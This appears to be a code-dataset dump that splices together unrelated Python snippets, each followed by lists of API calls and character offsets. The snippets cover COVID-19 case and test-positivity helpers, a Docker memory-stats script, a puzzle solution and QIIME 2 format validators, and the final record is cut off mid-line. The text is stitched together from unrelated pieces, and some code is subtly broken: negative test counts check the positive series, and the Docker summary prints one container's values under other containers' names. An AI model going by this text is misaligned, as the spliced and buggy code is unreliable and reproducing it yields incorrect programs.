def get_state_cases(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
input_states = [definitions.states[s] for s in state_codes]
state_data = nyt_data_state[nyt_data_state.state.isin(input_states)][:]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
case_sum = day_data.cases.sum() / states_population * 1000000
else:
case_sum = day_data.cases.sum()
newRow = {'date': curr_date, 'cases': case_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
def get_us_cases(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
us_data = nyt_data_us[(nyt_data_us.date >= start_date) & (nyt_data_us.date <= end_date)]
return us_data[['date', 'cases']]
"""
get_state_deaths
Same as above, deaths
"""
def get_state_deaths(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
input_states = [definitions.states[s] for s in state_codes]
state_data = nyt_data_state[nyt_data_state.state.isin(input_states)]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
case_sum = day_data.deaths.sum() / states_population * 1000000
else:
case_sum = day_data.deaths.sum()
newRow = {'date': curr_date, 'deaths': case_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
def get_us_deaths(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
us_data = nyt_data_us[(nyt_data_us.date >= start_date) & (nyt_data_us.date <= end_date)]
return us_data[['date', 'deaths']]
"""
get_state_hospitalizations
Same as above, hospitalizations
"""
def get_state_hospitalizations(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today(), normalize=True):
curr_date = start_date
state_data = hhs_data[hhs_data.state.isin(state_codes)]
input_states = [definitions.states[s] for s in state_codes]
max_date = state_data.date.max()
states_population = sum([definitions.populations[s] for s in input_states])
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = state_data[state_data.date == str(curr_date)]
if normalize:
hosp_sum = day_data.inpatient_beds_used_covid.sum() / states_population * 1000000
else:
hosp_sum = day_data.inpatient_beds_used_covid.sum()
newRow = {'date': curr_date, 'hospitalizations': hosp_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
"""
get_us_hospitalizations
Same as above, hospitalizations
"""
def get_us_hospitalizations(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
curr_date = start_date
max_date = hhs_data.date.max()
lst = []
while(curr_date <= end_date and curr_date <= max_date):
day_data = hhs_data[hhs_data.date == str(curr_date)]
hosp_sum = day_data.inpatient_beds_used_covid.sum()
newRow = {'date': curr_date, 'inpatient_beds_used_covid': hosp_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
return pd.DataFrame(lst)
"""
get_state_positivity
Creates dataframe of time series date and test positivity for given state
inputs:
state_code: list of 2-letter codes of states
start_date (pd.Timestamp): starting date, defaults to 1-1-2020
end_date (pd.Timestamp): ending date, defaults to today
returns:
df with 'date' and 'test_positivity'
"""
def get_state_positivity(state_codes, start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
test_data_state = test_data[test_data.state.isin(state_codes)] # Get only data from input State
max_date = test_data_state.date.max()
curr_date = start_date
lst = []
while(curr_date <= end_date and curr_date <= max_date): # Loop through all unique dates
day_data = test_data_state[test_data_state.date == str(curr_date)]
test_pos = day_data[day_data.overall_outcome == "Positive"].new_results_reported # Get num positive tests
test_pos = test_pos.sum() if test_pos.any() else 0 # Extract number if exists
test_neg = day_data[day_data.overall_outcome == "Negative"].new_results_reported # Get num negative tests
test_neg = test_neg.sum() if test_neg.any() else 0 # Extract number if exists
if(test_pos == 0 and test_neg == 0):
test_pct = 0 # Fixes divide by zero issue
else:
test_pct = test_pos/ (test_pos + test_neg) * 100
newRow = {"date": curr_date, "test_positivity": test_pct, "positive_tests" : test_pos, "negative_tests" : test_neg}
lst.append(newRow)
curr_date += datetime.timedelta(1)
df = pd.DataFrame(lst) # Create dataframe with all dates and test positivity
a = df.rolling(7).sum()
df['avg'] = a.apply(lambda x: (100* (x.positive_tests / (x.positive_tests + x.negative_tests))) if (x.positive_tests + x.negative_tests) > 0 else None, axis=1)
return df
"""
get_us_positivity
Constructs a data table of the entire US test positivity
start_date (datetime.date) : Starting date of table
end_date (datetime.date) : Ending date of table
returns: dataframe with date, test positivity
"""
def get_us_positivity(start_date = pd.Timestamp(2020,1,1), end_date = pd.Timestamp.today()):
curr_date = start_date
max_date = test_data.date.max()
lst = []
while (curr_date <= end_date and curr_date <= max_date):
test_data_curr = test_data[test_data.date==str(curr_date)]
test_pos = test_data_curr[test_data_curr.overall_outcome == "Positive"].new_results_reported
test_neg = test_data_curr[test_data_curr.overall_outcome == "Negative"].new_results_reported
pos_sum = test_pos.sum() if test_pos.any() else 0
neg_sum = test_neg.sum() if test_pos.any() else 0
test_positivity = pos_sum / (pos_sum + neg_sum) * 100 if (pos_sum + neg_sum) > 0 else None
newRow = {"date": curr_date, "test_positivity": test_positivity, "positive_tests" : pos_sum, "negative_tests": neg_sum}
lst.append(newRow)
curr_date += datetime.timedelta(1)
df = pd.DataFrame(lst)
# Calculates 7-day averages of test positivity using sums over the window
a = df.rolling(7).sum()
df['avg'] = a.apply(lambda x: (100* (x.positive_tests / (x.positive_tests + x.negative_tests))) if (x.positive_tests + x.negative_tests) > 0 else None, axis=1)
return df
"""
get_all_state_hosps
Constructs a table of the most recent hospitalizations per capita for every State
returns: dataframe with state, hosp per million
"""
def get_all_state_hosps():
state_hosps = pd.DataFrame(columns=['State', 'Hospitalizations'])
for state in definitions.states.keys():
state_data = hhs_data[hhs_data.state.isin([state])]
state_data = state_data[state_data['date'] <= pd.Timestamp.today()]
hosps = state_data[state_data['date'] == state_data['date'].max()].inpatient_beds_used_covid.values
if not hosps:
hosps = False
else:
hosps = hosps[0]/definitions.populations[definitions.states[state]]*1000000
state_hosps = state_hosps.append({"State":state, "Hospitalizations per Million": float(hosps)}, ignore_index=True)
return state_hosps
"""
get_all_state_cases
Constructs a table of the most recent cases per capita for every State
returns: dataframe with state, cases per million
"""
def get_all_state_cases():
state_cases = pd.DataFrame(columns=['State', 'Cases'])
for state in definitions.states.keys():
state_data = get_state_cases([state], start_date=(pd.Timestamp.today() - pd.Timedelta(days=7)).date()) # adjust end date here
if state_data.empty:
cases = False
else:
cases = state_data.cases.sum() / len(state_data)
state_cases = state_cases.append({"State":state, "Cases": float(cases)}, ignore_index=True)
return state_cases
"""
get_all_state_rt
Constructs a table of the most recent rt for every State
returns: dataframe with state, rt
"""
def get_all_state_rt(avg=True):
state_rt = pd.DataFrame(columns=['State', 'Rt'])
for state in definitions.states.keys():
data = get_state_hospitalizations(state_codes=[state], start_date=(pd.Timestamp.today() - pd.Timedelta(days=20)).date())
if data.empty:
rt = False
else:
rt= 1 + data.iloc[:,1].pct_change(periods=7)
if(avg):
y1 = rt.rolling(7).mean()
rt = y1.iloc[-1]
else:
rt = rt.iloc[-1]
state_rt = state_rt.append({"State":state, "Rt": float(rt)}, ignore_index=True)
return state_rt
|
[
"pandas.DataFrame",
"pandas.Timestamp",
"definitions.states.keys",
"pandas.read_csv",
"sodapy.Socrata",
"pandas.to_datetime",
"datetime.timedelta",
"pandas.DataFrame.from_records",
"pandas.Timedelta",
"pandas.concat",
"pandas.Timestamp.today"
] |
[((514, 625), 'pandas.read_csv', 'pd.read_csv', (['"""https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv"""'], {}), "(\n 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us.csv'\n )\n", (525, 625), True, 'import pandas as pd\n'), ((637, 755), 'pandas.read_csv', 'pd.read_csv', (['"""https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv"""'], {}), "(\n 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/rolling-averages/us-states.csv'\n )\n", (648, 755), True, 'import pandas as pd\n'), ((759, 790), 'sodapy.Socrata', 'Socrata', (['"""healthdata.gov"""', 'None'], {}), "('healthdata.gov', None)\n", (766, 790), False, 'from sodapy import Socrata\n'), ((1993, 2036), 'pandas.to_datetime', 'pd.to_datetime', (['hhs_provisional.update_date'], {}), '(hhs_provisional.update_date)\n', (2007, 2036), True, 'import pandas as pd\n'), ((2593, 2610), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (2602, 2610), True, 'import pandas as pd\n'), ((2779, 2808), 'pandas.to_datetime', 'pd.to_datetime', (['hhs_data.date'], {}), '(hhs_data.date)\n', (2793, 2808), True, 'import pandas as pd\n'), ((2984, 3014), 'pandas.to_datetime', 'pd.to_datetime', (['test_data.date'], {}), '(test_data.date)\n', (2998, 3014), True, 'import pandas as pd\n'), ((3038, 3070), 'pandas.to_datetime', 'pd.to_datetime', (['nyt_data_us.date'], {}), '(nyt_data_us.date)\n', (3052, 3070), True, 'import pandas as pd\n'), ((3097, 3132), 'pandas.to_datetime', 'pd.to_datetime', (['nyt_data_state.date'], {}), '(nyt_data_state.date)\n', (3111, 3132), True, 'import pandas as pd\n'), ((3539, 3563), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (3551, 3563), True, 'import pandas as pd\n'), ((3574, 3594), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (3592, 3594), True, 'import pandas as pd\n'), ((4326, 4343), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (4338, 4343), True, 'import pandas as pd\n'), ((4375, 4399), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (4387, 4399), True, 'import pandas as pd\n'), ((4410, 4430), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (4428, 4430), True, 'import pandas as pd\n'), ((4659, 4683), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (4671, 4683), True, 'import pandas as pd\n'), ((4694, 4714), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (4712, 4714), True, 'import pandas as pd\n'), ((5446, 5463), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (5458, 5463), True, 'import pandas as pd\n'), ((5496, 5520), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (5508, 5520), True, 'import pandas as pd\n'), ((5531, 5551), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (5549, 5551), True, 'import pandas as pd\n'), ((5811, 5835), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (5823, 5835), True, 'import pandas as pd\n'), ((5846, 5866), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (5864, 5866), True, 'import pandas as pd\n'), ((6633, 6650), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (6645, 6650), True, 'import pandas as pd\n'), ((6756, 6780), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (6768, 6780), True, 'import pandas as pd\n'), ((6791, 6811), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (6809, 6811), True, 'import pandas as pd\n'), ((7227, 7244), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (7239, 7244), True, 'import pandas as pd\n'), ((7623, 7647), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (7635, 7647), True, 'import pandas as pd\n'), ((7658, 7678), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (7676, 7678), True, 'import pandas as pd\n'), ((8808, 8825), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (8820, 8825), True, 'import pandas as pd\n'), ((9353, 9377), 'pandas.Timestamp', 'pd.Timestamp', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (9365, 9377), True, 'import pandas as pd\n'), ((9388, 9408), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (9406, 9408), True, 'import pandas as pd\n'), ((10239, 10256), 'pandas.DataFrame', 'pd.DataFrame', (['lst'], {}), '(lst)\n', (10251, 10256), True, 'import pandas as pd\n'), ((10745, 10796), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Hospitalizations']"}), "(columns=['State', 'Hospitalizations'])\n", (10757, 10796), True, 'import pandas as pd\n'), ((10814, 10839), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (10837, 10839), False, 'import definitions\n'), ((11579, 11619), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Cases']"}), "(columns=['State', 'Cases'])\n", (11591, 11619), True, 'import pandas as pd\n'), ((11637, 11662), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (11660, 11662), False, 'import definitions\n'), ((12219, 12256), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['State', 'Rt']"}), "(columns=['State', 'Rt'])\n", (12231, 12256), True, 'import pandas as pd\n'), ((12274, 12299), 'definitions.states.keys', 'definitions.states.keys', ([], {}), '()\n', (12297, 12299), False, 'import definitions\n'), ((1002, 1036), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['results'], {}), '(results)\n', (1027, 1036), True, 'import pandas as pd\n'), ((1258, 1297), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['test_results'], {}), '(test_results)\n', (1283, 1297), True, 'import pandas as pd\n'), ((1801, 1839), 'pandas.DataFrame.from_records', 'pd.DataFrame.from_records', (['provisional'], {}), '(provisional)\n', (1826, 1839), True, 'import pandas as pd\n'), ((4293, 4314), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (4311, 4314), False, 'import datetime\n'), ((5413, 5434), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (5431, 5434), False, 'import datetime\n'), ((6600, 6621), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (6618, 6621), False, 'import datetime\n'), ((7194, 7215), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (7212, 7215), False, 'import datetime\n'), ((8776, 8797), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (8794, 8797), False, 'import datetime\n'), ((10208, 10229), 'datetime.timedelta', 'datetime.timedelta', (['(1)'], {}), '(1)\n', (10226, 10229), False, 'import datetime\n'), ((2326, 2342), 'pandas.read_csv', 'pd.read_csv', (['url'], {}), '(url)\n', (2337, 2342), True, 'import pandas as pd\n'), ((2425, 2447), 'pandas.Timestamp', 'pd.Timestamp', (['max_date'], {}), '(max_date)\n', (2437, 2447), True, 'import pandas as pd\n'), ((10955, 10975), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (10973, 10975), True, 'import pandas as pd\n'), ((11722, 11742), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (11740, 11742), True, 'import pandas as pd\n'), ((11745, 11765), 'pandas.Timedelta', 'pd.Timedelta', ([], {'days': '(7)'}), '(days=7)\n', (11757, 11765), True, 'import pandas as pd\n'), ((12376, 12396), 'pandas.Timestamp.today', 'pd.Timestamp.today', ([], {}), '()\n', (12394, 12396), True, 'import pandas as pd\n'), ((12399, 12420), 'pandas.Timedelta', 'pd.Timedelta', ([], {'days': '(20)'}), '(days=20)\n', (12411, 12420), True, 'import pandas as pd\n')]
|
import docker
import os
import glob
import json
import datetime
import numpy
client = docker.APIClient(base_url='unix://var/run/docker.sock')
def mem_stats(container_id):
docker_stats = client.stats(container_id, decode=True, stream=False)
mem_stats = docker_stats['memory_stats']
wanted_keys = ['usage', 'max_usage']
container_mem_stats = dict(
(k, mem_stats[k]) for k in wanted_keys if k in mem_stats.keys())
# ['stats']['rss']
container_mem_stats['name'] = docker_stats['name']
return container_mem_stats
def collect_stats(sockshop_containers, ntimes=1):
# {"name" : "component name", "timestamps": "datetime", "docker_stats":...}
stats_average = dict()
for c_id in sockshop_containers:
stats_average[c_id] = {"usage": [],
"max_usage": [], "rss": [], "total_rss": []}
for i in range(ntimes):
stats = []
for container_id in sockshop_containers:
docker_stats = client.stats(
container_id, decode=True, stream=False)
container_stats = dict()
container_stats["timestamp"] = datetime.datetime.now().isoformat()
container_stats["name"] = docker_stats['name']
container_stats["docker_stats"] = docker_stats
stats.append(container_stats)
# print(stats_average)
stats_average[container_id]['name'] = docker_stats['name']
stats_average[container_id]['usage'].append(
docker_stats['memory_stats']['usage'])
stats_average[container_id]['max_usage'].append(
docker_stats['memory_stats']['max_usage'])
stats_average[container_id]['rss'].append(
docker_stats['memory_stats']['stats']['rss'])
stats_average[container_id]['total_rss'].append(
docker_stats['memory_stats']['stats']['total_rss'])
with open("tosker_{0}.log".format(ntimes), 'w') as outfile:
json.dump(stats, outfile)
# print(stats_average)
n_containers = 0
for key, value in stats_average.items():
stats_average[key]["avg_usage"] = numpy.mean(value['usage'])
stats_average[key]["avg_max_usage"] = numpy.mean(value['max_usage'])
stats_average[key]["avg_rss"] = numpy.mean(value['rss'])
stats_average[key]["avg_total_rss"] = numpy.mean(value['total_rss'])
n_containers += 1
container_usage = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_usage"]))
container_max_usage = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_max_usage"]))
container_rss = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_rss"]))
container_total_rss = max(stats_average.keys(), key=(
lambda k: stats_average[k]["avg_total_rss"]))
avg_usage = []
avg_max_usage = []
avg_rss = []
avg_total_rss = []
for key, value in stats_average.items():
avg_usage.append(value["avg_usage"])
avg_max_usage.append(value["avg_max_usage"])
avg_rss.append(value["avg_rss"])
avg_total_rss.append(value["avg_total_rss"])
# print(stats_average)
print(n_containers, "containers")
print("Usage :{0},\nMax usage:{1},\nRss:{2},\nTotal rss:{3}".format(
numpy.mean(avg_usage) / 1024 / 1024,
numpy.mean(avg_max_usage) / 1024 / 1024,
numpy.mean(avg_rss) / 1024 / 1024,
numpy.mean(avg_total_rss) / 1024 / 1024
))
print("Max containers: \n name {0} usage:{1},\n name {2} Max usage:{3},Name {4} Rss:{5}, \n Name {6} Total rss:{7}".format(
stats_average[container_usage]['name'], stats_average[container_usage]["avg_usage"] / 1024 / 1024,
stats_average[container_max_usage]['name'], stats_average[container_usage]["avg_max_usage"] / 1024 / 1024,
stats_average[container_rss]['name'], stats_average[container_usage]["avg_rss"] / 1024 / 1024,
stats_average[container_usage]['name'], stats_average[container_usage]["avg_total_rss"] / 1024 / 1024
))
# '{p[first]} {p[last]}'.format(p=person)
sockshop_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "sockshop-app")
print(sockshop_dir)
tosker_yaml_files = list()
os.chdir(sockshop_dir)
for tosker_file in glob.glob("*.yaml"):
tosker_yaml_files.append(os.path.join(sockshop_dir, tosker_file))
# run tosker
# for tosker_yaml_file in tosker_yaml_files:
# print("Starting {} yaml file ...".format(
# os.path.basename(os.path.normpath(tosker_yaml_file))))
# os.system("tosker {0} create start".format(tosker_yaml_file))
sockshop_containers = [container['Id'] for container in client.containers(
) if "sockshop" in container['Names'][0]]
# collect_stats(sockshop_containers, ntimes=3)
for i in map(mem_stats, sockshop_containers):
print(i)
# client.stats(client.containers()[0]['Id'], stream=False)['memory_stats']
# memory_stats :{
# 'limit': 8274780160,
# 'max_usage': 634081280,
# 'usage': 598896640
# 'stats': {'inactive_anon': 16384,
# 'rss': 53108736,
# 'total_rss': 53108736
# 'mapped_file': 4907008,
# 'dirty': 3379200,
# 'active_file': 395481088,
# 'unevictable': 0,
# 'total_writeback': 0,
# 'total_cache': 545763328, 'active_anon': 53432320, 'total_pgpgout': 1152618,
# 'total_active_file': 395481088,
# 'inactive_file': 149889024, 'writeback': 0, 'total_unevictable': 0,
# 'total_pgpgin': 1290140, 'rss_huge': 16777216, 'pgpgin': 1290140,
# 'total_dirty': 3379200, 'pgmajfault': 0, 'total_mapped_file': 4907008,
# 'cache': 545763328, 'total_inactive_file': 149889024,
# 'total_inactive_anon': 16384, 'total_pgfault': 1497954, 'total_active_anon': 53432320,
# 'total_rss_huge': 16777216, 'hierarchical_memory_limit': 9223372036854771712,
# 'total_pgmajfault': 0, 'pgfault': 1497954, 'pgpgout': 1152618
# },
# }
# {
# "storage_stats":{ },
# "memory_stats":{
# "name":"/sockshop_group-go.front-end-node",
# "cpu_stats":{ },
# "precpu_stats":{ },
# "read":"2017-11-10T09:39:58.567678054Z",
# "num_procs":0,
# "blkio_stats":{ },
# "networks":{ },
# "preread":"2017-11-10T09:39:57.56778472Z",
# "pids_stats":{ },
# "id":"b3b991051ff614137685ccd6cd57dd02e63aacfe1a22440b1d81024f7d644466"
# }
|
[
"json.dump",
"os.path.abspath",
"docker.APIClient",
"datetime.datetime.now",
"numpy.mean",
"glob.glob",
"os.path.join",
"os.chdir"
] |
[((87, 142), 'docker.APIClient', 'docker.APIClient', ([], {'base_url': '"""unix://var/run/docker.sock"""'}), "(base_url='unix://var/run/docker.sock')\n", (103, 142), False, 'import docker\n'), ((4274, 4296), 'os.chdir', 'os.chdir', (['sockshop_dir'], {}), '(sockshop_dir)\n', (4282, 4296), False, 'import os\n'), ((4316, 4335), 'glob.glob', 'glob.glob', (['"""*.yaml"""'], {}), "('*.yaml')\n", (4325, 4335), False, 'import glob\n'), ((2161, 2187), 'numpy.mean', 'numpy.mean', (["value['usage']"], {}), "(value['usage'])\n", (2171, 2187), False, 'import numpy\n'), ((2234, 2264), 'numpy.mean', 'numpy.mean', (["value['max_usage']"], {}), "(value['max_usage'])\n", (2244, 2264), False, 'import numpy\n'), ((2305, 2329), 'numpy.mean', 'numpy.mean', (["value['rss']"], {}), "(value['rss'])\n", (2315, 2329), False, 'import numpy\n'), ((2376, 2406), 'numpy.mean', 'numpy.mean', (["value['total_rss']"], {}), "(value['total_rss'])\n", (2386, 2406), False, 'import numpy\n'), ((4182, 4207), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (4197, 4207), False, 'import os\n'), ((4366, 4405), 'os.path.join', 'os.path.join', (['sockshop_dir', 'tosker_file'], {}), '(sockshop_dir, tosker_file)\n', (4378, 4405), False, 'import os\n'), ((2000, 2025), 'json.dump', 'json.dump', (['stats', 'outfile'], {}), '(stats, outfile)\n', (2009, 2025), False, 'import json\n'), ((1138, 1161), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1159, 1161), False, 'import datetime\n'), ((3328, 3349), 'numpy.mean', 'numpy.mean', (['avg_usage'], {}), '(avg_usage)\n', (3338, 3349), False, 'import numpy\n'), ((3373, 3398), 'numpy.mean', 'numpy.mean', (['avg_max_usage'], {}), '(avg_max_usage)\n', (3383, 3398), False, 'import numpy\n'), ((3422, 3441), 'numpy.mean', 'numpy.mean', (['avg_rss'], {}), '(avg_rss)\n', (3432, 3441), False, 'import numpy\n'), ((3465, 3490), 'numpy.mean', 'numpy.mean', (['avg_total_rss'], {}), '(avg_total_rss)\n', (3475, 3490), False, 'import numpy\n')]
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
#import module_mass file as a pd.DataFrame and name column
input = pd.read_csv('input.txt', header = None)
input.columns = ['module_mass']
#calculate fuel needed
input['fuel'] = (input['module_mass']/3)
input['fuel_round']= input['fuel'].apply(np.floor)
input['fuel_needed'] = input['fuel_round']-2
print(input.fuel_needed.sum())
|
[
"pandas.read_csv"
] |
[((131, 168), 'pandas.read_csv', 'pd.read_csv', (['"""input.txt"""'], {'header': 'None'}), "('input.txt', header=None)\n", (142, 168), True, 'import pandas as pd\n')]
|
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
n, q = map(int, readline().split())
f = [['N'] * n for _ in range(n)]
for i in range(q):
s = list(map(int, readline().split()))
s[1] -= 1
if s[0] == 1:
s[2] -= 1
f[s[1]][s[2]] = 'Y'
if s[0] == 2:
for i in range(n):
if i == s[1]:
continue
if f[i][s[1]] == 'Y':
f[s[1]][i] = 'Y'
if s[0] == 3:
b = []
for i in range(n):
if s[1] == i:
continue
if f[s[1]][i] == 'Y':
b.append(i)
a = set()
for check in b:
for i in range(n):
if check == i or i == s[1]:
continue
if f[check][i] == 'Y':
a.add(i)
for i in range(n):
if s[1] == i:
continue
if i in a:
f[s[1]][i] = 'Y'
for ans in f:
print(*ans, sep='')
|
[
"sys.setrecursionlimit"
] |
[((116, 146), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10 ** 7)'], {}), '(10 ** 7)\n', (137, 146), False, 'import sys\n')]
|
import pandas as pd
import re
import qiime2
import qiime2.plugin.model as model
from qiime2.plugin import SemanticType
from q2_types.feature_data import FeatureData
from qiime2.plugin import ValidationError
class UNIXListFormat(model.TextFileFormat):
def _validate_(self, level):
# any file with lines will be valid
return True
def to_list(self):
with self.open() as fh:
return [s.strip() for s in fh]
class IDMetadataFormat(model.TextFileFormat):
def _validate_(self, level):
try:
self.to_metadata()
except qiime2.metadata.MetadataFileError as md_exc:
raise model.ValidationError(md_exc) from md_exc
def to_metadata(self):
return qiime2.Metadata.load(str(self))
class IDSelectionDirFmt(model.DirectoryFormat):
included = model.File('included.txt', format=UNIXListFormat)
excluded = model.File('excluded.txt', format=UNIXListFormat)
metadata = model.File('metadata.tsv', format=IDMetadataFormat)
label = model.File('label.txt', format=UNIXListFormat)
class IDSelection:
def __init__(self, inclusion: pd.Series, metadata: qiime2.Metadata,
label: str):
self.inclusion = inclusion
self.metadata = metadata
self.label = label
Selection = SemanticType('Selection', variant_of=FeatureData.field['type'])
# modified from DNAFastaFormat in q2_types to allow lowercase characters
# https://github.com/qiime2/q2-types/blob/058ee0e40e38edaa02b1aad034df37456aeb4ddf/q2_types/feature_data/_format.py#L146
class GISAIDDNAFASTAFormat(model.TextFileFormat):
def _validate_lines(self, max_lines):
FASTADNAValidator = re.compile(
r'[ACGTURYKMSWBDHVNacgturykmswbdhvn\-\. ]+\r?\n?')
ValidationSet = frozenset(('A', 'C', 'G', 'T', 'U', 'R', 'Y', 'K', 'M',
'S', 'W', 'B', 'D', 'H', 'V', 'N', 'a', 'c',
'g', 't', 'u', 'r', 'y', 'k', 'm', 's', 'w',
'b', 'd', 'h', 'v', 'n', '-', '.', ' '))
last_line_was_ID = False
ids = {}
with open(str(self), 'rb') as fh:
try:
first = fh.read(6)
if first[:3] == b'\xEF\xBB\xBF':
first = first[3:]
# Empty files should validate
if first.strip() == b'':
return
if first[0] != ord(b'>'):
raise ValidationError("First line of file is not a valid "
"description. Descriptions must "
"start with '>'")
fh.seek(0)
for line_number, line in enumerate(fh, 1):
line = line.strip()
if line_number >= max_lines:
return
line = line.decode('utf-8-sig')
if line.startswith('>'):
if last_line_was_ID:
raise ValidationError('Multiple consecutive '
'descriptions starting on '
f'line {line_number-1!r}')
line = line.split()
if line[0] == '>':
if len(line) == 1:
raise ValidationError(
f'Description on line {line_number} is '
'missing an ID.')
else:
raise ValidationError(
f'ID on line {line_number} starts with a '
'space. IDs may not start with spaces')
if line[0] in ids:
raise ValidationError(
f'ID on line {line_number} is a duplicate of '
f'another ID on line {ids[line[0]]}.')
ids[line[0]] = line_number
last_line_was_ID = True
elif re.fullmatch(FASTADNAValidator, line):
last_line_was_ID = False
else:
for position, character in enumerate(line):
if character not in ValidationSet:
raise ValidationError(
f"Invalid character '{character}' at "
f"position {position} on line "
f"{line_number} (does not match IUPAC "
"characters for a DNA sequence).")
except UnicodeDecodeError as e:
raise ValidationError(f'utf-8 cannot decode byte on line '
f'{line_number}') from e
def _validate_(self, max_lines):
level_map = {'min': 100, 'max': float('inf')}
self._validate_lines(level_map[max_lines])
|
[
"re.fullmatch",
"qiime2.plugin.model.File",
"qiime2.plugin.ValidationError",
"qiime2.plugin.SemanticType",
"qiime2.plugin.model.ValidationError",
"re.compile"
] |
[((1310, 1373), 'qiime2.plugin.SemanticType', 'SemanticType', (['"""Selection"""'], {'variant_of': "FeatureData.field['type']"}), "('Selection', variant_of=FeatureData.field['type'])\n", (1322, 1373), False, 'from qiime2.plugin import SemanticType\n'), ((837, 886), 'qiime2.plugin.model.File', 'model.File', (['"""included.txt"""'], {'format': 'UNIXListFormat'}), "('included.txt', format=UNIXListFormat)\n", (847, 886), True, 'import qiime2.plugin.model as model\n'), ((902, 951), 'qiime2.plugin.model.File', 'model.File', (['"""excluded.txt"""'], {'format': 'UNIXListFormat'}), "('excluded.txt', format=UNIXListFormat)\n", (912, 951), True, 'import qiime2.plugin.model as model\n'), ((967, 1018), 'qiime2.plugin.model.File', 'model.File', (['"""metadata.tsv"""'], {'format': 'IDMetadataFormat'}), "('metadata.tsv', format=IDMetadataFormat)\n", (977, 1018), True, 'import qiime2.plugin.model as model\n'), ((1031, 1077), 'qiime2.plugin.model.File', 'model.File', (['"""label.txt"""'], {'format': 'UNIXListFormat'}), "('label.txt', format=UNIXListFormat)\n", (1041, 1077), True, 'import qiime2.plugin.model as model\n'), ((1690, 1754), 're.compile', 're.compile', 